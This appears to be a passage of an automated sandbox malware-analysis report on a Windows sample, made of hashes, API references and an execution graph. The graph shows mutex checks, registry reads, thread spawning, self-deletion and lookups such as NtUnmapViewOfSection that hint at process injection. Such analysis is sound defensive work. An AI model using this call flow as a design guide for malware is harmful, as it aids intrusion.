                                                                                                                                                                                      • Opcode Fuzzy Hash: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                                                                                                                                      • Instruction Fuzzy Hash: 59018436615732ABE7319B689C8CB4B7798EF056E2B214623F909D7158D731D801CAE0
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • _free.LIBCMT ref: 1000655C
                                                                                                                                                                                        • Part of subcall function 100062BC: IsProcessorFeaturePresent.KERNEL32(00000017,100062AB,00000000,?,?,?,?,00000016,?,?,100062B8,00000000,00000000,00000000,00000000,00000000), ref: 100062BE
                                                                                                                                                                                        • Part of subcall function 100062BC: GetCurrentProcess.KERNEL32(C0000417), ref: 100062E0
                                                                                                                                                                                        • Part of subcall function 100062BC: TerminateProcess.KERNEL32(00000000), ref: 100062E7
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                      • Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_20_2_10000000_vbc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                                                                                                      • String ID: *?$.
                                                                                                                                                                                      • API String ID: 2667617558-3972193922
                                                                                                                                                                                      • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                                                                                                                      • Instruction ID: 55016225c6cf3c2ad74d5bf99958d96f24b8fe448c0df4d83e2be8db5664878a
                                                                                                                                                                                      • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2D519475E0060A9FEB14CFA8CC81AADB7F6FF4C394F258169E854E7349D635AE018B50
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                      • Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_20_2_10000000_vbc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _strlen
                                                                                                                                                                                      • String ID: : $Se.
                                                                                                                                                                                      • API String ID: 4218353326-4089948878
                                                                                                                                                                                      • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                                                                                      • Instruction ID: 66f447a9efa091531784e06c0e565222335d100d85517175c1dac28435e0d9bb
                                                                                                                                                                                      • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2F11E7B5904249AEDB11DFA8D841BDEFBFCEF09244F104056E545E7252E6706B02C765
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 10002903
                                                                                                                                                                                        • Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632
                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 10002920
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                      • Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_20_2_10000000_vbc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                                      • String ID: Unknown exception
                                                                                                                                                                                      • API String ID: 3476068407-410509341
                                                                                                                                                                                      • Opcode ID: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                                                                                                                                      • Instruction ID: 696891806b75a506f07e96a947ab79166ff1ea0d2f17bc9dac180a151cc952bd
                                                                                                                                                                                      • Opcode Fuzzy Hash: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2BF0A47890420D77AB04E6E5EC4599D77ACDB006D0F508161FD1496499EF31FA658690
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                      • Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_20_2_10000000_vbc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CommandLine
                                                                                                                                                                                      • String ID: p4P
                                                                                                                                                                                      • API String ID: 3253501508-2079396673
                                                                                                                                                                                      • Opcode ID: f03b9bd105845c934ec86b57f4a2021404f8ac89823aaf0d7c22f7e26958660e
                                                                                                                                                                                      • Instruction ID: 64725d3052c2c9ae7bbd7e52e8b3a5750bb25634a918b02f39acb7dc5bcd530d
                                                                                                                                                                                      • Opcode Fuzzy Hash: f03b9bd105845c934ec86b57f4a2021404f8ac89823aaf0d7c22f7e26958660e
                                                                                                                                                                                      • Instruction Fuzzy Hash: C0B00278C012209FE744AF7499DC2487FB0B758752B90D8AFD51AD2764D635C047EF20
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                      Execution Coverage:1.2%
                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                      Signature Coverage:2.2%
                                                                                                                                                                                      Total number of Nodes:551
                                                                                                                                                                                      Total number of Limit Nodes:14
                                                                                                                                                                                      execution_graph 47115 434887 47116 434893 ___FrameUnwindToState 47115->47116 47141 434596 47116->47141 47118 43489a 47120 4348c3 47118->47120 47437 4349f9 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 47118->47437 47129 434902 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 47120->47129 47438 444251 5 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 47120->47438 47122 4348dc 47124 4348e2 ___FrameUnwindToState 47122->47124 47439 4441f5 5 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 47122->47439 47125 434962 47152 434b14 47125->47152 47129->47125 47440 4433e7 35 API calls 5 library calls 47129->47440 47136 43498e 47138 434997 47136->47138 47441 4433c2 28 API calls _Atexit 47136->47441 47442 43470d 13 API calls 2 library calls 47138->47442 47142 43459f 47141->47142 47443 434c52 IsProcessorFeaturePresent 47142->47443 47144 4345ab 47444 438f31 10 API calls 4 library calls 47144->47444 47146 4345b0 47147 4345b4 47146->47147 47445 4440bf 47146->47445 47147->47118 47150 4345cb 47150->47118 47468 436e90 47152->47468 47155 434968 47156 4441a2 47155->47156 47470 44f059 47156->47470 47158 4441ab 47159 434971 47158->47159 47474 446815 35 API calls 47158->47474 47161 40e9c5 47159->47161 47476 41cb50 LoadLibraryA GetProcAddress 47161->47476 47163 40e9e1 GetModuleFileNameW 47481 40f3c3 47163->47481 47165 40e9fd 47496 4020f6 47165->47496 47168 4020f6 28 API calls 47169 40ea1b 47168->47169 47502 41be1b 47169->47502 47173 40ea2d 47528 401e8d 47173->47528 47175 40ea36 47176 40ea93 47175->47176 47177 40ea49 47175->47177 47534 401e65 22 API calls 47176->47534 47558 40fbb3 116 API calls 47177->47558 47180 40eaa3 47535 401e65 22 API calls 47180->47535 47181 40ea5b 47559 401e65 22 API calls 47181->47559 47183 40ea67 47560 410f37 36 API calls __EH_prolog 47183->47560 47185 40eac2 47536 40531e 28 API calls 47185->47536 47188 40ead1 47537 406383 28 API calls 47188->47537 47189 40ea79 47561 40fb64 77 API calls 47189->47561 47192 40eadd 47538 401fe2 47192->47538 47193 40ea82 47562 40f3b0 70 API calls 47193->47562 47199 401fd8 11 API calls 47201 40eefb 47199->47201 47200 401fd8 11 API calls 47202 40eafb 47200->47202 47432 4432f6 GetModuleHandleW 47201->47432 47550 401e65 22 API calls 47202->47550 47204 40eb04 47551 401fc0 28 API calls 47204->47551 47206 40eb0f 47552 401e65 22 API calls 47206->47552 47208 40eb28 47553 401e65 22 API calls 47208->47553 47210 40eb43 47211 40ebae 47210->47211 47563 406c1e 28 API calls 47210->47563 47554 401e65 22 API calls 47211->47554 47214 40eb70 47215 401fe2 28 API calls 47214->47215 47216 40eb7c 47215->47216 47219 401fd8 11 API calls 47216->47219 47217 40ec02 47555 40d069 47217->47555 47218 40ebbb 47218->47217 47565 413549 RegOpenKeyExA RegQueryValueExA RegCloseKey 47218->47565 47220 40eb85 47219->47220 47564 413549 RegOpenKeyExA RegQueryValueExA RegCloseKey 47220->47564 47222 40ec08 47224 40ea8b 47222->47224 47567 41b2c3 33 API calls 47222->47567 47224->47199 47227 40eba4 47227->47211 47229 40f34f 47227->47229 47228 40ec23 47231 40ec76 47228->47231 47568 407716 RegOpenKeyExA RegQueryValueExA RegCloseKey 47228->47568 47650 4139a9 30 API calls 47229->47650 47230 40ebe6 47230->47217 47566 4139a9 30 API calls 47230->47566 47573 401e65 22 API calls 47231->47573 47236 40f365 47651 412475 65 API calls ___scrt_fastfail 47236->47651 47237 40ec7f 47245 40ec90 47237->47245 47246 40ec8b 47237->47246 47238 40ec3e 47240 40ec42 47238->47240 47241 40ec4c 47238->47241 47569 407738 30 API calls 47240->47569 47571 401e65 22 API calls 47241->47571 47575 401e65 22 API calls 47245->47575 47574 407755 CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 47246->47574 47247 40ec47 47570 407260 97 API calls 47247->47570 47249 40f37f 47653 413a23 RegOpenKeyExW RegDeleteValueW 47249->47653 47252 40ec99 47576 41bc5e 28 API calls 47252->47576 47254 40ec55 47254->47231 47258 40ec71 47254->47258 47255 40eca4 47577 401f13 28 API calls 47255->47577 47572 407260 97 API calls 47258->47572 47259 40f392 47654 401f09 11 API calls 47259->47654 47260 40ecaf 47578 401f09 11 API calls 47260->47578 47264 40f39c 47655 401f09 11 API calls 47264->47655 47265 40ecb8 47579 401e65 22 API calls 47265->47579 47268 40f3a5 47656 40dd42 27 API calls 47268->47656 47269 40ecc1 47580 401e65 22 API calls 47269->47580 47271 40f3aa 47657 414f2a 167 API calls _strftime 47271->47657 47275 40ecdb 47581 401e65 22 API calls 47275->47581 47277 40ecf5 47582 401e65 22 API calls 47277->47582 47279 40ed80 47281 40ed8a 47279->47281 47288 40ef06 ___scrt_fastfail 47279->47288 47280 40ed0e 47280->47279 47583 401e65 22 API calls 47280->47583 47283 40ed93 47281->47283 47291 40ee0f 47281->47291 47589 401e65 22 API calls 47283->47589 47285 40ed9c 47590 401e65 22 API calls 47285->47590 47286 40ed23 _wcslen 47286->47279 47584 401e65 22 API calls 47286->47584 47600 4136f8 RegOpenKeyExA RegQueryValueExA RegCloseKey 47288->47600 47290 40edae 47591 401e65 22 API calls 47290->47591 47314 40ee0a ___scrt_fastfail 47291->47314 47292 40ed3e 47293 40ed45 47292->47293 47585 401e65 22 API calls 47293->47585 47297 40edc0 47592 401e65 22 API calls 47297->47592 47298 40ed53 47586 40da34 31 API calls 47298->47586 47299 40ef51 47601 401e65 22 API calls 47299->47601 47302 40ef76 47602 402093 28 API calls 47302->47602 47304 40ede9 47593 401e65 22 API calls 47304->47593 47305 40ed66 47587 401f13 28 API calls 47305->47587 47309 40ed72 47588 401f09 11 API calls 47309->47588 47310 40edfa 47594 40cdf9 45 API calls _wcslen 47310->47594 47311 40ef88 47603 41376f 14 API calls 47311->47603 47313 40ed7b 47313->47279 47314->47291 47595 413947 31 API calls 47314->47595 47318 40eea3 ctype 47596 401e65 22 API calls 47318->47596 47319 40ef9e 47604 401e65 22 API calls 47319->47604 47321 40efaa 47605 43baac 39 API calls _strftime 47321->47605 47324 40efb7 47326 40efe4 47324->47326 47606 41cd9b 86 API calls ___scrt_fastfail 47324->47606 47325 40eeba 47325->47299 47597 401e65 22 API calls 47325->47597 47607 402093 28 API calls 47326->47607 47329 40eed7 47598 41bc5e 28 API calls 47329->47598 47330 40efc8 CreateThread 47330->47326 47764 41d45d 10 API calls 47330->47764 47333 40eff9 47608 402093 28 API calls 47333->47608 47334 40eee3 47599 40f474 103 API calls 47334->47599 47337 40f008 47609 41b4ef 79 API calls 47337->47609 47338 40eee8 47338->47299 47340 40eeef 47338->47340 47340->47224 47341 40f00d 47610 401e65 22 API calls 47341->47610 47343 40f019 47611 401e65 22 API calls 47343->47611 47345 40f02b 47612 401e65 22 API calls 47345->47612 47347 40f04b 47613 43baac 39 API calls _strftime 47347->47613 47349 40f058 47614 401e65 22 API calls 47349->47614 47351 40f063 47615 401e65 22 API calls 47351->47615 47353 40f074 47616 401e65 22 API calls 47353->47616 47355 40f089 47617 401e65 22 API calls 47355->47617 47357 40f09a 47358 40f0a1 StrToIntA 47357->47358 47618 409de4 168 API calls _wcslen 47358->47618 47360 40f0b3 47619 401e65 22 API calls 47360->47619 47362 40f101 47628 401e65 22 API calls 47362->47628 47363 40f0bc 47363->47362 47620 4344ea 47363->47620 47368 40f0e4 47371 40f0eb CreateThread 47368->47371 47369 40f159 47630 401e65 22 API calls 47369->47630 47370 40f111 47370->47369 47372 4344ea new 22 API calls 47370->47372 47371->47362 47767 419fb4 102 API calls 2 library calls 47371->47767 47374 40f126 47372->47374 47629 401e65 22 API calls 47374->47629 47376 40f138 47379 40f13f CreateThread 47376->47379 47377 40f1cc 47636 401e65 22 API calls 47377->47636 47378 40f162 47378->47377 47631 401e65 22 API calls 47378->47631 47379->47369 47765 419fb4 102 API calls 2 library calls 47379->47765 47382 40f17e 47632 401e65 22 API calls 47382->47632 47383 40f1d5 47384 40f21a 47383->47384 47637 401e65 22 API calls 47383->47637 47641 41b60d 79 API calls 47384->47641 47387 40f193 47633 40d9e8 31 API calls 47387->47633 47389 40f1ea 47638 401e65 22 API calls 47389->47638 47390 40f223 47642 401f13 28 API calls 47390->47642 47392 40f22e 47643 401f09 11 API calls 47392->47643 47396 40f1a6 47634 401f13 28 API calls 47396->47634 47397 40f237 CreateThread 47402 40f264 47397->47402 47403 40f258 CreateThread 47397->47403 47766 40f7a7 120 API calls 47397->47766 47398 40f1ff 47639 43baac 39 API calls _strftime 47398->47639 47401 40f1b2 47635 401f09 11 API calls 47401->47635 47405 40f279 47402->47405 47406 40f26d CreateThread 47402->47406 47403->47402 47768 4120f7 137 API calls 47403->47768 47410 40f2cc 47405->47410 47644 402093 28 API calls 47405->47644 47406->47405 47769 4126db 38 API calls ___scrt_fastfail 47406->47769 47408 40f1bb CreateThread 47408->47377 47763 401be9 49 API calls _strftime 47408->47763 47409 40f20c 47640 40c162 7 API calls 47409->47640 47646 4134ff RegOpenKeyExA RegQueryValueExA RegCloseKey 47410->47646 47413 40f29c 47645 4052fd 28 API calls 47413->47645 47417 40f2e4 47417->47268 47647 41bc5e 28 API calls 47417->47647 47422 40f2fd 47648 41361b 31 API calls 47422->47648 47426 40f313 47649 401f09 11 API calls 47426->47649 47428 40f346 DeleteFileW 47429 40f34d 47428->47429 47430 40f31e 47428->47430 47652 41bc5e 28 API calls 47429->47652 47430->47428 47430->47429 47431 40f334 Sleep 47430->47431 47431->47430 47433 434984 47432->47433 47433->47136 47434 44341f 47433->47434 47771 44319c 47434->47771 47437->47118 47438->47122 47439->47129 47440->47125 47441->47138 47442->47124 47443->47144 47444->47146 47449 44fb68 47445->47449 47448 438f5a 8 API calls 3 library calls 47448->47147 47452 44fb81 47449->47452 47453 44fb85 47449->47453 47451 4345bd 47451->47150 47451->47448 47460 434fcb 47452->47460 47453->47452 47455 449bf0 47453->47455 47456 449bf7 47455->47456 47457 449c3a GetStdHandle 47456->47457 47458 449ca2 47456->47458 47459 449c4d GetFileType 47456->47459 47457->47456 47458->47453 47459->47456 47461 434fd6 IsProcessorFeaturePresent 47460->47461 47462 434fd4 47460->47462 47464 435018 47461->47464 47462->47451 47467 434fdc SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 47464->47467 47466 4350fb 47466->47451 47467->47466 47469 434b27 GetStartupInfoW 47468->47469 47469->47155 47471 44f06b 47470->47471 47472 44f062 47470->47472 47471->47158 47475 44ef58 48 API calls 5 library calls 47472->47475 47474->47158 47475->47471 47477 41cb8f LoadLibraryA GetProcAddress 47476->47477 47478 41cb7f GetModuleHandleA GetProcAddress 47476->47478 47479 41cbb8 44 API calls 47477->47479 47480 41cba8 LoadLibraryA GetProcAddress 47477->47480 47478->47477 47479->47163 47480->47479 47658 41b4a8 FindResourceA 47481->47658 47485 40f3ed ctype 47668 4020b7 47485->47668 47488 401fe2 28 API calls 47489 40f413 47488->47489 47490 401fd8 11 API calls 47489->47490 47491 40f41c 47490->47491 47492 43bd51 new 21 API calls 47491->47492 47493 40f42d ctype 47492->47493 47674 406dd8 47493->47674 47495 40f460 47495->47165 47497 40210c 47496->47497 47498 4023ce 11 API calls 47497->47498 47499 402126 47498->47499 47500 402569 28 API calls 47499->47500 47501 402134 47500->47501 47501->47168 47711 4020df 47502->47711 47504 401fd8 11 API calls 47505 41bed0 47504->47505 47506 401fd8 11 API calls 47505->47506 47508 41bed8 47506->47508 47507 41bea0 47727 4041a2 28 API calls 47507->47727 47511 401fd8 11 API calls 47508->47511 47514 40ea24 47511->47514 47512 41beac 47515 401fe2 28 API calls 47512->47515 47513 41be2e 47513->47507 47516 401fe2 28 API calls 47513->47516 47519 401fd8 11 API calls 47513->47519 47523 41be9e 47513->47523 47715 4041a2 28 API calls 47513->47715 47716 41ce34 47513->47716 47524 40fb17 47514->47524 47517 41beb5 47515->47517 47516->47513 47518 401fd8 11 API calls 47517->47518 47520 41bebd 47518->47520 47519->47513 47522 41ce34 28 API calls 47520->47522 47522->47523 47523->47504 47525 40fb23 47524->47525 47527 40fb2a 47524->47527 47753 402163 11 API calls 47525->47753 47527->47173 47529 402163 47528->47529 47533 40219f 47529->47533 47754 402730 11 API calls 47529->47754 47531 402184 47755 402712 11 API calls std::_Deallocate 47531->47755 47533->47175 47534->47180 47535->47185 47536->47188 47537->47192 47539 401ff1 47538->47539 47540 402039 47538->47540 47541 4023ce 11 API calls 47539->47541 47547 401fd8 47540->47547 47542 401ffa 47541->47542 47543 40203c 47542->47543 47544 402015 47542->47544 47757 40267a 11 API calls 47543->47757 47756 403098 28 API calls 47544->47756 47548 4023ce 11 API calls 47547->47548 47549 401fe1 47548->47549 47549->47200 47550->47204 47551->47206 47552->47208 47553->47210 47554->47218 47758 401fab 47555->47758 47557 40d073 CreateMutexA GetLastError 47557->47222 47558->47181 47559->47183 47560->47189 47561->47193 47563->47214 47564->47227 47565->47230 47566->47217 47567->47228 47568->47238 47569->47247 47570->47241 47571->47254 47572->47231 47573->47237 47574->47245 47575->47252 47576->47255 47577->47260 47578->47265 47579->47269 47580->47275 47581->47277 47582->47280 47583->47286 47584->47292 47585->47298 47586->47305 47587->47309 47588->47313 47589->47285 47590->47290 47591->47297 47592->47304 47593->47310 47594->47314 47595->47318 47596->47325 47597->47329 47598->47334 47599->47338 47600->47299 47601->47302 47602->47311 47603->47319 47604->47321 47605->47324 47606->47330 47607->47333 47608->47337 47609->47341 47610->47343 47611->47345 47612->47347 47613->47349 47614->47351 47615->47353 47616->47355 47617->47357 47618->47360 47619->47363 47624 4344ef 47620->47624 47621 43bd51 new 21 API calls 47621->47624 47622 40f0d1 47627 401e65 22 API calls 47622->47627 47624->47621 47624->47622 47759 442f80 7 API calls 2 library calls 47624->47759 47760 434c35 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 47624->47760 47761 43526e RaiseException Concurrency::cancel_current_task __CxxThrowException@8 47624->47761 47627->47368 47628->47370 47629->47376 47630->47378 47631->47382 47632->47387 47633->47396 47634->47401 47635->47408 47636->47383 47637->47389 47638->47398 47639->47409 47640->47384 47641->47390 47642->47392 47643->47397 47644->47413 47646->47417 47647->47422 47648->47426 47649->47430 47650->47236 47652->47249 47653->47259 47654->47264 47655->47268 47656->47271 47762 41ad17 103 API calls 47657->47762 47659 41b4c5 LoadResource LockResource SizeofResource 47658->47659 47660 40f3de 47658->47660 47659->47660 47661 43bd51 47660->47661 47666 446137 ___crtLCMapStringA 47661->47666 47662 446175 47678 4405dd 20 API calls __dosmaperr 47662->47678 47664 446160 RtlAllocateHeap 47665 446173 47664->47665 47664->47666 47665->47485 47666->47662 47666->47664 47677 442f80 7 API calls 2 library calls 47666->47677 47669 4020bf 47668->47669 47679 4023ce 47669->47679 47671 4020ca 47683 40250a 47671->47683 47673 4020d9 47673->47488 47675 4020b7 28 API calls 47674->47675 47676 406dec 47675->47676 47676->47495 47677->47666 47678->47665 47680 402428 47679->47680 47681 4023d8 47679->47681 47680->47671 47681->47680 47690 4027a7 11 API calls std::_Deallocate 47681->47690 47684 40251a 47683->47684 47685 402520 47684->47685 47686 402535 47684->47686 47691 402569 47685->47691 47701 4028e8 28 API calls 47686->47701 47689 402533 47689->47673 47690->47680 47702 402888 47691->47702 47693 40257d 47694 402592 47693->47694 47695 4025a7 47693->47695 47707 402a34 22 API calls 47694->47707 47709 4028e8 28 API calls 47695->47709 47698 40259b 47708 4029da 22 API calls 47698->47708 47700 4025a5 47700->47689 47701->47689 47703 402890 47702->47703 47704 402898 47703->47704 47710 402ca3 22 API calls 47703->47710 47704->47693 47707->47698 47708->47700 47709->47700 47712 4020e7 47711->47712 47713 4023ce 11 API calls 47712->47713 47714 4020f2 47713->47714 47714->47513 47715->47513 47717 41ce41 47716->47717 47718 41cea0 47717->47718 47720 41ce51 47717->47720 47719 41ceba 47718->47719 47721 41cfe0 28 API calls 47718->47721 47737 41d146 28 API calls 47719->47737 47723 41ce89 47720->47723 47728 41cfe0 47720->47728 47721->47719 47736 41d146 28 API calls 47723->47736 47724 41ce9c 47724->47513 47727->47512 47730 41cfe8 47728->47730 47729 41d01a 47729->47723 47730->47729 47731 41d01e 47730->47731 47734 41d002 47730->47734 47748 402725 22 API calls 47731->47748 47738 41d051 47734->47738 47736->47724 47737->47724 47739 41d05b __EH_prolog 47738->47739 47749 402717 22 API calls 47739->47749 47741 41d06e 47750 41d15d 11 API calls 47741->47750 47743 41d094 47744 41d0cc 47743->47744 47751 402730 11 API calls 47743->47751 47744->47729 47746 41d0b3 47752 402712 11 API calls std::_Deallocate 47746->47752 47749->47741 47750->47743 47751->47746 47752->47744 47753->47527 47754->47531 47755->47533 47756->47540 47757->47540 47759->47624 47770 4127ee 61 API calls 47768->47770 47772 4431a8 ___FrameUnwindToState 47771->47772 47773 4431c0 47772->47773 47774 4432f6 _Atexit GetModuleHandleW 47772->47774 47793 445888 EnterCriticalSection 47773->47793 47776 4431b4 47774->47776 47776->47773 47805 44333a GetModuleHandleExW 47776->47805 47777 443266 47794 4432a6 47777->47794 47781 44323d 47784 443255 47781->47784 47814 4441f5 5 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 47781->47814 47782 443283 47797 4432b5 47782->47797 47783 4432af 47816 457729 5 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 47783->47816 47815 4441f5 5 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 47784->47815 47785 4431c8 47785->47777 47785->47781 47813 443f50 20 API calls _Atexit 47785->47813 47793->47785 47817 4458d0 LeaveCriticalSection 47794->47817 47796 44327f 47796->47782 47796->47783 47818 448cc9 47797->47818 47800 4432e3 47803 44333a _Atexit 8 API calls 47800->47803 47801 4432c3 GetPEB 47801->47800 47802 4432d3 GetCurrentProcess TerminateProcess 47801->47802 47802->47800 47804 4432eb ExitProcess 47803->47804 47806 443364 GetProcAddress 47805->47806 47807 443387 47805->47807 47812 443379 47806->47812 47808 443396 47807->47808 47809 44338d FreeLibrary 47807->47809 47810 434fcb __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 47808->47810 47809->47808 47811 4433a0 47810->47811 47811->47773 47812->47807 47813->47781 47814->47784 47815->47777 47817->47796 47819 448cee 47818->47819 47821 448ce4 47818->47821 47824 4484ca 47819->47824 47822 434fcb __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 47821->47822 47823 4432bf 47822->47823 47823->47800 47823->47801 47825 4484f6 47824->47825 47826 4484fa 47824->47826 47825->47826 47829 44851a 47825->47829 47831 448566 47825->47831 47826->47821 47828 448526 GetProcAddress 47830 448536 __crt_fast_encode_pointer 47828->47830 47829->47826 47829->47828 47830->47826 47832 448587 LoadLibraryExW 47831->47832 47837 44857c 47831->47837 47833 4485a4 GetLastError 47832->47833 47834 4485bc 47832->47834 47833->47834 47835 4485af LoadLibraryExW 47833->47835 47836 4485d3 FreeLibrary 47834->47836 47834->47837 47835->47834 47836->47837 47837->47825 47838 404e26 WaitForSingleObject 47839 404e40 SetEvent FindCloseChangeNotification 47838->47839 47840 404e57 closesocket 47838->47840 47841 404ed8 47839->47841 47842 404e64 47840->47842 47843 404e7a 47842->47843 47851 4050e4 83 API calls 47842->47851 47845 404e8c WaitForSingleObject 47843->47845 47846 404ece SetEvent CloseHandle 47843->47846 47852 41e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47845->47852 47846->47841 47848 404e9b SetEvent WaitForSingleObject 47853 41e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47848->47853 47850 404eb3 SetEvent CloseHandle CloseHandle 47850->47846 47851->47843 47852->47848 47853->47850 47854 448299 GetLastError 47855 4482b2 47854->47855 47856 4482b8 47854->47856 47880 4487bc 11 API calls 2 library calls 47855->47880 47861 44830f SetLastError 47856->47861 47873 445af3 47856->47873 47860 4482d2 47881 446782 20 API calls __dosmaperr 47860->47881 47862 448318 47861->47862 47865 4482e7 47865->47860 47867 4482ee 47865->47867 47866 4482d8 47868 448306 SetLastError 47866->47868 47883 448087 20 API calls ___FrameUnwindToState 47867->47883 47868->47862 47870 4482f9 47884 446782 20 API calls __dosmaperr 47870->47884 47872 4482ff 47872->47861 47872->47868 47876 445b00 ___crtLCMapStringA 47873->47876 47874 445b40 47886 4405dd 20 API calls __dosmaperr 47874->47886 47875 445b2b RtlAllocateHeap 47875->47876 47877 445b3e 47875->47877 47876->47874 47876->47875 47885 442f80 7 API calls 2 library calls 47876->47885 47877->47860 47882 448812 11 API calls 2 library calls 47877->47882 47880->47856 47881->47866 47882->47865 47883->47870 47884->47872 47885->47876 47886->47877 47887 40165e 47888 401666 47887->47888 47889 401669 47887->47889 47890 4016a8 47889->47890 47892 401696 47889->47892 47891 4344ea new 22 API calls 47890->47891 47893 40169c 47891->47893 47894 4344ea new 22 API calls 47892->47894 47894->47893

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CB88
                                                                                                                                                                                      • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
                                                                                                                                                                                      • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
                                                                                                                                                                                      • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
